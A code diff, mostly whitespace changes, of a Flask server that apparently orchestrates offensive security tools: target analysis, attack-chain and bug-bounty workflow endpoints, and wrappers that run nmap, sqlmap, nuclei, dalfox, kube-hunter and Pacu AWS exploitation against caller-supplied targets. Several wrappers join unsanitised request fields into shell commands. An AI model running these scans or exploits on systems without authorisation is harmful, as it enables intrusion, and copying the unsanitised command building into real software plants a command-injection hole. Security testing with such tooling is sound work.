Create beautiful progress bar using ModernVisualEngine progress_bar = ModernVisualEngine.render_progress_bar( - progress_fraction, - width=25, + progress_fraction, + width=25, style='cyber', eta=info.get("eta", 0) ) - + process_status = { "pid": pid, "command": info["command"][:60] + "..." if len(info["command"]) > 60 else info["command"], @@ -7589,9 +7589,9 @@ def process_dashboard(): "last_output": info.get("last_output", "")[:100] } dashboard["processes"].append(process_status) - + return jsonify(dashboard) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error getting process dashboard: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -7603,16 +7603,16 @@ def create_vulnerability_card(): data = request.get_json() if not data: return jsonify({"error": "No data provided"}), 400 - + # Create vulnerability card card = ModernVisualEngine.render_vulnerability_card(data) - + return jsonify({ "success": True, "vulnerability_card": card, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error creating vulnerability card: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -7624,16 +7624,16 @@ def create_summary_report(): data = request.get_json() if not data: return jsonify({"error": "No data provided"}), 400 - + # Create summary report report = ModernVisualEngine.create_summary_report(data) - + return jsonify({ "success": True, "summary_report": report, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error creating summary report: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -7645,20 +7645,20 @@ def format_tool_output(): data = request.get_json() if not data or 'tool' not in data or 'output' not in data: return jsonify({"error": "Tool and output data required"}), 400 - + tool = data['tool'] output = data['output'] success = data.get('success', True) - + # Format tool output formatted_output = ModernVisualEngine.format_tool_output(tool, output, success) - + return jsonify({ "success": True, "formatted_output": formatted_output, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error formatting tool output: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -7674,22 +7674,22 @@ def analyze_target(): data = request.get_json() if not data or 'target' not in data: return jsonify({"error": "Target is required"}), 400 - + target = data['target'] logger.info(f"๐Ÿง  Analyzing target: {target}") - + # Use the decision engine to analyze the target profile = decision_engine.analyze_target(target) - + logger.info(f"โœ… Target analysis completed for {target}") logger.info(f"๐Ÿ“Š Target type: {profile.target_type.value}, Risk level: {profile.risk_level}") - + return jsonify({ "success": True, "target_profile": profile.to_dict(), "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error analyzing target: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -7701,20 +7701,20 @@ def select_optimal_tools(): data = request.get_json() if not data or 'target' not in data: return jsonify({"error": "Target is required"}), 400 - + target = data['target'] objective = data.get('objective', 'comprehensive') # comprehensive, quick, stealth - + logger.info(f"๐ŸŽฏ Selecting optimal tools for {target} with objective: {objective}") - + # Analyze target first profile = decision_engine.analyze_target(target) - + # Select optimal tools selected_tools = 
decision_engine.select_optimal_tools(profile, objective) - + logger.info(f"โœ… Selected {len(selected_tools)} tools for {target}") - + return jsonify({ "success": True, "target": target, @@ -7724,7 +7724,7 @@ def select_optimal_tools(): "tool_count": len(selected_tools), "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error selecting tools: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -7736,21 +7736,21 @@ def optimize_tool_parameters(): data = request.get_json() if not data or 'target' not in data or 'tool' not in data: return jsonify({"error": "Target and tool are required"}), 400 - + target = data['target'] tool = data['tool'] context = data.get('context', {}) - + logger.info(f"โš™๏ธ Optimizing parameters for {tool} against {target}") - + # Analyze target first profile = decision_engine.analyze_target(target) - + # Optimize parameters optimized_params = decision_engine.optimize_parameters(tool, profile, context) - + logger.info(f"โœ… Parameters optimized for {tool}") - + return jsonify({ "success": True, "target": target, @@ -7760,7 +7760,7 @@ def optimize_tool_parameters(): "optimized_parameters": optimized_params, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error optimizing parameters: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -7772,21 +7772,21 @@ def create_attack_chain(): data = request.get_json() if not data or 'target' not in data: return jsonify({"error": "Target is required"}), 400 - + target = data['target'] objective = data.get('objective', 'comprehensive') - + logger.info(f"โš”๏ธ Creating attack chain for {target} with objective: {objective}") - + # Analyze target first profile = decision_engine.analyze_target(target) - + # Create attack chain attack_chain = decision_engine.create_attack_chain(profile, objective) - + logger.info(f"โœ… Attack chain created with {len(attack_chain.steps)} steps") logger.info(f"๐Ÿ“Š Success probability: {attack_chain.success_probability:.2f}, Estimated time: {attack_chain.estimated_time}s") - + return jsonify({ "success": True, "target": target, @@ -7795,7 +7795,7 @@ def create_attack_chain(): "attack_chain": attack_chain.to_dict(), "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error creating attack chain: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -7807,19 +7807,19 @@ def intelligent_smart_scan(): data = request.get_json() if not data or 'target' not in data: return jsonify({"error": "Target is required"}), 400 - + target = data['target'] objective = data.get('objective', 'comprehensive') max_tools = data.get('max_tools', 5) - + logger.info(f"๐Ÿš€ Starting intelligent smart scan for {target}") - + # Analyze target profile = decision_engine.analyze_target(target) - + # Select optimal tools selected_tools = decision_engine.select_optimal_tools(profile, objective)[:max_tools] - + # Execute tools in parallel with real tool execution scan_results = { "target": target, @@ -7829,15 +7829,15 @@ def intelligent_smart_scan(): "execution_summary": {}, "combined_output": "" } - + def execute_single_tool(tool_name, target, profile): """Execute a single tool and return results""" try: logger.info(f"๐Ÿ”ง Executing {tool_name} with optimized parameters") - + # Get optimized parameters for this tool optimized_params = decision_engine.optimize_parameters(tool_name, profile) - + # Map tool names to their actual execution functions tool_execution_map 
= { 'nmap': lambda: execute_nmap_scan(target, optimized_params), @@ -7857,11 +7857,11 @@ def intelligent_smart_scan(): 'amass': lambda: execute_amass_scan(target, optimized_params), 'subfinder': lambda: execute_subfinder_scan(target, optimized_params) } - + # Execute the tool if we have a mapping for it if tool_name in tool_execution_map: result = tool_execution_map[tool_name]() - + # Extract vulnerability count from result vuln_count = 0 if result.get('success') and result.get('stdout'): @@ -7869,7 +7869,7 @@ def intelligent_smart_scan(): output = result.get('stdout', '') vuln_indicators = ['CRITICAL', 'HIGH', 'MEDIUM', 'VULNERABILITY', 'EXPLOIT', 'SQL injection', 'XSS', 'CSRF'] vuln_count = sum(1 for indicator in vuln_indicators if indicator.lower() in output.lower()) - + return { "tool": tool_name, "parameters": optimized_params, @@ -7892,7 +7892,7 @@ def intelligent_smart_scan(): "error": f"Tool {tool_name} not implemented in execution map", "success": False } - + except Exception as e: logger.error(f"โŒ Error executing {tool_name}: {str(e)}") return { @@ -7902,34 +7902,34 @@ def intelligent_smart_scan(): "error": str(e), "success": False } - + # Execute tools in parallel using ThreadPoolExecutor with ThreadPoolExecutor(max_workers=min(len(selected_tools), 5)) as executor: # Submit all tool executions future_to_tool = { - executor.submit(execute_single_tool, tool, target, profile): tool + executor.submit(execute_single_tool, tool, target, profile): tool for tool in selected_tools } - + # Collect results as they complete for future in future_to_tool: tool_result = future.result() scan_results["tools_executed"].append(tool_result) - + # Accumulate vulnerability count if tool_result.get("vulnerabilities_found"): scan_results["total_vulnerabilities"] += tool_result["vulnerabilities_found"] - + # Combine outputs if tool_result.get("stdout"): scan_results["combined_output"] += f"\n=== {tool_result['tool'].upper()} OUTPUT ===\n" scan_results["combined_output"] += tool_result["stdout"] scan_results["combined_output"] += "\n" + "="*50 + "\n" - + # Create execution summary successful_tools = [t for t in scan_results["tools_executed"] if t.get("success")] failed_tools = [t for t in scan_results["tools_executed"] if not t.get("success")] - + scan_results["execution_summary"] = { "total_tools": len(selected_tools), "successful_tools": len(successful_tools), @@ -7938,16 +7938,16 @@ def intelligent_smart_scan(): "total_execution_time": sum(t.get("execution_time", 0) for t in scan_results["tools_executed"]), "tools_used": [t["tool"] for t in successful_tools] } - + logger.info(f"โœ… Intelligent smart scan completed for {target}") logger.info(f"๐Ÿ“Š Results: {len(successful_tools)}/{len(selected_tools)} tools successful, {scan_results['total_vulnerabilities']} vulnerabilities found") - + return jsonify({ "success": True, "scan_results": scan_results, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in intelligent smart scan: {str(e)}") return jsonify({"error": f"Server error: {str(e)}", "success": False}), 500 @@ -7959,7 +7959,7 @@ def execute_nmap_scan(target, params): scan_type = params.get('scan_type', '-sV') ports = params.get('ports', '') additional_args = params.get('additional_args', '') - + # Build nmap command cmd_parts = ['nmap', scan_type] if ports: @@ -7967,7 +7967,7 @@ def execute_nmap_scan(target, params): if additional_args: cmd_parts.extend(additional_args.split()) cmd_parts.append(target) - + return execute_command(' '.join(cmd_parts)) 
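# ---------------------------------------------------------------------------
# [editor's sketch] The smart-scan logic above pairs a dispatch table
# (tool_execution_map) with a ThreadPoolExecutor. A minimal, self-contained
# version of that pattern is sketched below; TOOL_RUNNERS and
# run_tools_in_parallel are illustrative names, not part of HexStrike, and
# execute_command is the server helper defined earlier in this file.
from concurrent.futures import ThreadPoolExecutor, as_completed

TOOL_RUNNERS = {
    "nmap":   lambda target: execute_command(f"nmap -sV {target}"),
    "nuclei": lambda target: execute_command(f"nuclei -u {target}"),
}

def run_tools_in_parallel(target, tools, max_workers=5):
    """Fan a target out to every known tool runner and collect the results."""
    results = []
    workers = max(1, min(len(tools), max_workers))  # guard against empty tool list
    with ThreadPoolExecutor(max_workers=workers) as pool:
        futures = {pool.submit(TOOL_RUNNERS[t], target): t
                   for t in tools if t in TOOL_RUNNERS}
        for future in as_completed(futures):  # collect in completion order
            results.append({"tool": futures[future], "result": future.result()})
    return results
# ---------------------------------------------------------------------------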
except Exception as e: return {"success": False, "error": str(e)} @@ -7978,11 +7978,11 @@ def execute_gobuster_scan(target, params): mode = params.get('mode', 'dir') wordlist = params.get('wordlist', '/usr/share/wordlists/dirb/common.txt') additional_args = params.get('additional_args', '') - + cmd_parts = ['gobuster', mode, '-u', target, '-w', wordlist] if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -7993,7 +7993,7 @@ def execute_nuclei_scan(target, params): severity = params.get('severity', '') tags = params.get('tags', '') additional_args = params.get('additional_args', '') - + cmd_parts = ['nuclei', '-u', target] if severity: cmd_parts.extend(['-severity', severity]) @@ -8001,7 +8001,7 @@ def execute_nuclei_scan(target, params): cmd_parts.extend(['-tags', tags]) if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -8013,7 +8013,7 @@ def execute_nikto_scan(target, params): cmd_parts = ['nikto', '-h', target] if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -8025,7 +8025,7 @@ def execute_sqlmap_scan(target, params): cmd_parts = ['sqlmap', '-u', target] if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -8035,15 +8035,15 @@ def execute_ffuf_scan(target, params): try: wordlist = params.get('wordlist', '/usr/share/wordlists/dirb/common.txt') additional_args = params.get('additional_args', '') - + # Ensure target has FUZZ placeholder if 'FUZZ' not in target: target = target.rstrip('/') + '/FUZZ' - + cmd_parts = ['ffuf', '-u', target, '-w', wordlist] if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -8053,11 +8053,11 @@ def execute_feroxbuster_scan(target, params): try: wordlist = params.get('wordlist', '/usr/share/wordlists/dirb/common.txt') additional_args = params.get('additional_args', '') - + cmd_parts = ['feroxbuster', '-u', target, '-w', wordlist] if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -8069,7 +8069,7 @@ def execute_katana_scan(target, params): cmd_parts = ['katana', '-u', target] if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -8080,7 +8080,7 @@ def execute_httpx_scan(target, params): additional_args = params.get('additional_args', '-tech-detect -status-code') # Use shell command with pipe for httpx cmd = f"echo {target} | httpx {additional_args}" - + return execute_command(cmd) except Exception as e: return {"success": False, "error": str(e)} @@ -8092,7 +8092,7 @@ def execute_wpscan_scan(target, params): cmd_parts = ['wpscan', '--url', target] if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -8104,7 +8104,7 @@ def execute_dirsearch_scan(target, params): 
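# ---------------------------------------------------------------------------
# [editor's sketch] execute_gobuster_scan, execute_nuclei_scan, and the other
# wrappers in this region all share one shape: read defaults from params,
# build an argv list, append additional_args, join, and delegate to
# execute_command(), folding any exception into {"success": False, ...}.
# A hypothetical factory (make_scan_wrapper is not defined in HexStrike)
# could generate them:
def make_scan_wrapper(base_argv):
    """Build a params-driven wrapper around execute_command() (sketch)."""
    def wrapper(target, params):
        try:
            cmd_parts = [part.format(target=target) for part in base_argv]
            extra = params.get('additional_args', '')
            if extra:
                cmd_parts.extend(extra.split())
            return execute_command(' '.join(cmd_parts))
        except Exception as e:
            return {"success": False, "error": str(e)}
    return wrapper

# Usage sketch: execute_dirsearch_scan would then collapse to
# make_scan_wrapper(['dirsearch', '-u', '{target}'])
# ---------------------------------------------------------------------------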
cmd_parts = ['dirsearch', '-u', target] if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -8116,7 +8116,7 @@ def execute_arjun_scan(target, params): cmd_parts = ['arjun', '-u', target] if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -8128,7 +8128,7 @@ def execute_paramspider_scan(target, params): cmd_parts = ['paramspider', '-d', target] if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -8140,7 +8140,7 @@ def execute_dalfox_scan(target, params): cmd_parts = ['dalfox', 'url', target] if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -8152,7 +8152,7 @@ def execute_amass_scan(target, params): cmd_parts = ['amass', 'enum', '-d', target] if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -8164,7 +8164,7 @@ def execute_subfinder_scan(target, params): cmd_parts = ['subfinder', '-d', target] if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -8176,14 +8176,14 @@ def detect_technologies(): data = request.get_json() if not data or 'target' not in data: return jsonify({"error": "Target is required"}), 400 - + target = data['target'] - + logger.info(f"๐Ÿ” Detecting technologies for {target}") - + # Analyze target profile = decision_engine.analyze_target(target) - + # Get technology-specific recommendations tech_recommendations = {} for tech in profile.technologies: @@ -8205,9 +8205,9 @@ def detect_technologies(): "focus_areas": ["prototype pollution", "dependency vulnerabilities"], "priority": "medium" } - + logger.info(f"โœ… Technology detection completed for {target}") - + return jsonify({ "success": True, "target": target, @@ -8217,7 +8217,7 @@ def detect_technologies(): "target_profile": profile.to_dict(), "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in technology detection: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -8233,14 +8233,14 @@ def create_reconnaissance_workflow(): data = request.get_json() if not data or 'domain' not in data: return jsonify({"error": "Domain is required"}), 400 - + domain = data['domain'] scope = data.get('scope', []) out_of_scope = data.get('out_of_scope', []) program_type = data.get('program_type', 'web') - + logger.info(f"๐ŸŽฏ Creating reconnaissance workflow for {domain}") - + # Create bug bounty target target = BugBountyTarget( domain=domain, @@ -8248,18 +8248,18 @@ def create_reconnaissance_workflow(): out_of_scope=out_of_scope, program_type=program_type ) - + # Generate reconnaissance workflow workflow = bugbounty_manager.create_reconnaissance_workflow(target) - + logger.info(f"โœ… Reconnaissance workflow created for {domain}") - + return jsonify({ "success": True, "workflow": workflow, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error creating reconnaissance workflow: {str(e)}") 
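# ---------------------------------------------------------------------------
# [editor's sketch] A client-side view of the reconnaissance-workflow handler
# above. The route path and port are assumptions (the @app.route decorator and
# server defaults fall outside this excerpt); the request keys (domain, scope,
# out_of_scope, program_type) and the success/workflow response shape are
# taken from the handler itself.
import requests

resp = requests.post(
    "http://127.0.0.1:8888/api/bugbounty/reconnaissance-workflow",  # assumed
    json={
        "domain": "example.com",
        "scope": ["*.example.com"],
        "out_of_scope": ["blog.example.com"],
        "program_type": "web",
    },
    timeout=300,
)
data = resp.json()
if data.get("success"):
    print(data["workflow"])
# ---------------------------------------------------------------------------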
return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -8271,31 +8271,31 @@ def create_vulnerability_hunting_workflow(): data = request.get_json() if not data or 'domain' not in data: return jsonify({"error": "Domain is required"}), 400 - + domain = data['domain'] priority_vulns = data.get('priority_vulns', ["rce", "sqli", "xss", "idor", "ssrf"]) bounty_range = data.get('bounty_range', 'unknown') - + logger.info(f"๐ŸŽฏ Creating vulnerability hunting workflow for {domain}") - + # Create bug bounty target target = BugBountyTarget( domain=domain, priority_vulns=priority_vulns, bounty_range=bounty_range ) - + # Generate vulnerability hunting workflow workflow = bugbounty_manager.create_vulnerability_hunting_workflow(target) - + logger.info(f"โœ… Vulnerability hunting workflow created for {domain}") - + return jsonify({ "success": True, "workflow": workflow, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error creating vulnerability hunting workflow: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -8307,26 +8307,26 @@ def create_business_logic_workflow(): data = request.get_json() if not data or 'domain' not in data: return jsonify({"error": "Domain is required"}), 400 - + domain = data['domain'] program_type = data.get('program_type', 'web') - + logger.info(f"๐ŸŽฏ Creating business logic testing workflow for {domain}") - + # Create bug bounty target target = BugBountyTarget(domain=domain, program_type=program_type) - + # Generate business logic testing workflow workflow = bugbounty_manager.create_business_logic_testing_workflow(target) - + logger.info(f"โœ… Business logic testing workflow created for {domain}") - + return jsonify({ "success": True, "workflow": workflow, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error creating business logic workflow: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -8338,25 +8338,25 @@ def create_osint_workflow(): data = request.get_json() if not data or 'domain' not in data: return jsonify({"error": "Domain is required"}), 400 - + domain = data['domain'] - + logger.info(f"๐ŸŽฏ Creating OSINT workflow for {domain}") - + # Create bug bounty target target = BugBountyTarget(domain=domain) - + # Generate OSINT workflow workflow = bugbounty_manager.create_osint_workflow(target) - + logger.info(f"โœ… OSINT workflow created for {domain}") - + return jsonify({ "success": True, "workflow": workflow, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error creating OSINT workflow: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -8368,26 +8368,26 @@ def create_file_upload_testing(): data = request.get_json() if not data or 'target_url' not in data: return jsonify({"error": "Target URL is required"}), 400 - + target_url = data['target_url'] - + logger.info(f"๐ŸŽฏ Creating file upload testing workflow for {target_url}") - + # Generate file upload testing workflow workflow = fileupload_framework.create_upload_testing_workflow(target_url) - + # Generate test files test_files = fileupload_framework.generate_test_files() workflow["test_files"] = test_files - + logger.info(f"โœ… File upload testing workflow created for {target_url}") - + return jsonify({ "success": True, "workflow": workflow, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error creating file upload testing workflow: {str(e)}") return jsonify({"error": f"Server 
error: {str(e)}"}), 500 @@ -8399,54 +8399,54 @@ def create_comprehensive_bugbounty_assessment(): data = request.get_json() if not data or 'domain' not in data: return jsonify({"error": "Domain is required"}), 400 - + domain = data['domain'] scope = data.get('scope', []) priority_vulns = data.get('priority_vulns', ["rce", "sqli", "xss", "idor", "ssrf"]) include_osint = data.get('include_osint', True) include_business_logic = data.get('include_business_logic', True) - + logger.info(f"๐ŸŽฏ Creating comprehensive bug bounty assessment for {domain}") - + # Create bug bounty target target = BugBountyTarget( domain=domain, scope=scope, priority_vulns=priority_vulns ) - + # Generate all workflows assessment = { "target": domain, "reconnaissance": bugbounty_manager.create_reconnaissance_workflow(target), "vulnerability_hunting": bugbounty_manager.create_vulnerability_hunting_workflow(target) } - + if include_osint: assessment["osint"] = bugbounty_manager.create_osint_workflow(target) - + if include_business_logic: assessment["business_logic"] = bugbounty_manager.create_business_logic_testing_workflow(target) - + # Calculate total estimates total_time = sum(workflow.get("estimated_time", 0) for workflow in assessment.values() if isinstance(workflow, dict)) total_tools = sum(workflow.get("tools_count", 0) for workflow in assessment.values() if isinstance(workflow, dict)) - + assessment["summary"] = { "total_estimated_time": total_time, "total_tools": total_tools, "workflow_count": len([k for k in assessment.keys() if k != "target"]), "priority_score": assessment["vulnerability_hunting"].get("priority_score", 0) } - + logger.info(f"โœ… Comprehensive bug bounty assessment created for {domain}") - + return jsonify({ "success": True, "assessment": assessment, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error creating comprehensive assessment: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -8465,25 +8465,25 @@ def nmap(): ports = params.get("ports", "") additional_args = params.get("additional_args", "-T4 -Pn") use_recovery = params.get("use_recovery", True) - + if not target: logger.warning("๐ŸŽฏ Nmap called without target parameter") return jsonify({ "error": "Target parameter is required" }), 400 - + command = f"nmap {scan_type}" - + if ports: command += f" -p {ports}" - + if additional_args: command += f" {additional_args}" - + command += f" {target}" - + logger.info(f"๐Ÿ” Starting Nmap scan: {target}") - + # Use intelligent error handling if enabled if use_recovery: tool_params = { @@ -8495,10 +8495,10 @@ def nmap(): result = execute_command_with_recovery("nmap", command, tool_params) else: result = execute_command(command) - + logger.info(f"๐Ÿ“Š Nmap scan completed for {target}") return jsonify(result) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in nmap endpoint: {str(e)}") return jsonify({ @@ -8515,27 +8515,27 @@ def gobuster(): wordlist = params.get("wordlist", "/usr/share/wordlists/dirb/common.txt") additional_args = params.get("additional_args", "") use_recovery = params.get("use_recovery", True) - + if not url: logger.warning("๐ŸŒ Gobuster called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 - + # Validate mode if mode not in ["dir", "dns", "fuzz", "vhost"]: logger.warning(f"โŒ Invalid gobuster mode: {mode}") return jsonify({ "error": f"Invalid mode: {mode}. 
Must be one of: dir, dns, fuzz, vhost" }), 400 - + command = f"gobuster {mode} -u {url} -w {wordlist}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ“ Starting Gobuster {mode} scan: {url}") - + # Use intelligent error handling if enabled if use_recovery: tool_params = { @@ -8547,10 +8547,10 @@ def gobuster(): result = execute_command_with_recovery("gobuster", command, tool_params) else: result = execute_command(command) - + logger.info(f"๐Ÿ“Š Gobuster scan completed for {url}") return jsonify(result) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in gobuster endpoint: {str(e)}") return jsonify({ @@ -8568,29 +8568,29 @@ def nuclei(): template = params.get("template", "") additional_args = params.get("additional_args", "") use_recovery = params.get("use_recovery", True) - + if not target: logger.warning("๐ŸŽฏ Nuclei called without target parameter") return jsonify({ "error": "Target parameter is required" }), 400 - + command = f"nuclei -u {target}" - + if severity: command += f" -severity {severity}" - + if tags: command += f" -tags {tags}" - + if template: command += f" -t {template}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ”ฌ Starting Nuclei vulnerability scan: {target}") - + # Use intelligent error handling if enabled if use_recovery: tool_params = { @@ -8603,10 +8603,10 @@ def nuclei(): result = execute_command_with_recovery("nuclei", command, tool_params) else: result = execute_command(command) - + logger.info(f"๐Ÿ“Š Nuclei scan completed for {target}") return jsonify(result) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in nuclei endpoint: {str(e)}") return jsonify({ @@ -8629,27 +8629,27 @@ def prowler(): output_dir = params.get("output_dir", "/tmp/prowler_output") output_format = params.get("output_format", "json") additional_args = params.get("additional_args", "") - + # Ensure output directory exists Path(output_dir).mkdir(parents=True, exist_ok=True) - + command = f"prowler {provider}" - + if profile: command += f" --profile {profile}" - + if region: command += f" --region {region}" - + if checks: command += f" --checks {checks}" - + command += f" --output-directory {output_dir}" command += f" --output-format {output_format}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"โ˜๏ธ Starting Prowler {provider} security assessment") result = execute_command(command) result["output_directory"] = output_dir @@ -8672,27 +8672,27 @@ def trivy(): severity = params.get("severity", "") output_file = params.get("output_file", "") additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐ŸŽฏ Trivy called without target parameter") return jsonify({ "error": "Target parameter is required" }), 400 - + command = f"trivy {scan_type} {target}" - + if output_format: command += f" --format {output_format}" - + if severity: command += f" --severity {severity}" - + if output_file: command += f" --output {output_file}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting Trivy {scan_type} scan: {target}") result = execute_command(command) if output_file: @@ -8720,26 +8720,26 @@ def scout_suite(): services = params.get("services", "") exceptions = params.get("exceptions", "") additional_args = params.get("additional_args", "") - + # Ensure report directory exists Path(report_dir).mkdir(parents=True, exist_ok=True) - + command = f"scout {provider}" - + if profile and provider == "aws": command += f" --profile {profile}" - + if 
services: command += f" --services {services}" - + if exceptions: command += f" --exceptions {exceptions}" - + command += f" --report-dir {report_dir}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"โ˜๏ธ Starting Scout Suite {provider} assessment") result = execute_command(command) result["report_directory"] = report_dir @@ -8758,22 +8758,22 @@ def cloudmapper(): account = params.get("account", "") config = params.get("config", "config.json") additional_args = params.get("additional_args", "") - + if not account and action != "webserver": logger.warning("โ˜๏ธ CloudMapper called without account parameter") return jsonify({"error": "Account parameter is required for most actions"}), 400 - + command = f"cloudmapper {action}" - + if account: command += f" --account {account}" - + if config: command += f" --config {config}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"โ˜๏ธ Starting CloudMapper {action}") result = execute_command(command) logger.info(f"๐Ÿ“Š CloudMapper {action} completed") @@ -8792,42 +8792,42 @@ def pacu(): data_services = params.get("data_services", "") regions = params.get("regions", "") additional_args = params.get("additional_args", "") - + # Create Pacu command sequence commands = [] commands.append(f"set_session {session_name}") - + if data_services: commands.append(f"data {data_services}") - + if regions: commands.append(f"set_regions {regions}") - + if modules: for module in modules.split(","): commands.append(f"run {module.strip()}") - + commands.append("exit") - + # Create command file command_file = "/tmp/pacu_commands.txt" with open(command_file, "w") as f: f.write("\n".join(commands)) - + command = f"pacu < {command_file}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"โ˜๏ธ Starting Pacu AWS exploitation") result = execute_command(command) - + # Cleanup try: os.remove(command_file) except: pass - + logger.info(f"๐Ÿ“Š Pacu exploitation completed") return jsonify(result) except Exception as e: @@ -8846,9 +8846,9 @@ def kube_hunter(): active = params.get("active", False) report = params.get("report", "json") additional_args = params.get("additional_args", "") - + command = "kube-hunter" - + if target: command += f" --remote {target}" elif remote: @@ -8860,16 +8860,16 @@ def kube_hunter(): else: # Default to pod scanning command += " --pod" - + if active: command += " --active" - + if report: command += f" --report {report}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"โ˜๏ธ Starting kube-hunter Kubernetes scan") result = execute_command(command) logger.info(f"๐Ÿ“Š kube-hunter scan completed") @@ -8888,24 +8888,24 @@ def kube_bench(): config_dir = params.get("config_dir", "") output_format = params.get("output_format", "json") additional_args = params.get("additional_args", "") - + command = "kube-bench" - + if targets: command += f" --targets {targets}" - + if version: command += f" --version {version}" - + if config_dir: command += f" --config-dir {config_dir}" - + if output_format: command += f" --outputfile /tmp/kube-bench-results.{output_format} --json" - + if additional_args: command += f" {additional_args}" - + logger.info(f"โ˜๏ธ Starting kube-bench CIS benchmark") result = execute_command(command) logger.info(f"๐Ÿ“Š kube-bench benchmark completed") @@ -8923,21 +8923,21 @@ def docker_bench_security(): exclude = params.get("exclude", "") # Checks to exclude output_file = params.get("output_file", "/tmp/docker-bench-results.json") 
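# ---------------------------------------------------------------------------
# [editor's sketch] The Pacu handler above drives an interactive CLI by
# writing a command script and redirecting it to stdin
# ("pacu < /tmp/pacu_commands.txt"). The same pattern with a collision-safe
# temp file and guaranteed cleanup is sketched below; run_scripted_cli is an
# illustrative name, and execute_command is the server helper defined earlier.
import os
import tempfile

def run_scripted_cli(binary, script_lines):
    """Feed a newline-separated command script to an interactive CLI (sketch)."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    try:
        with os.fdopen(fd, "w") as f:
            f.write("\n".join(script_lines) + "\n")
        return execute_command(f"{binary} < {path}")  # relies on shell redirection
    finally:
        try:
            os.remove(path)
        except OSError:
            pass

# Usage sketch: run_scripted_cli("pacu", ["set_session demo", "exit"])
# ---------------------------------------------------------------------------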
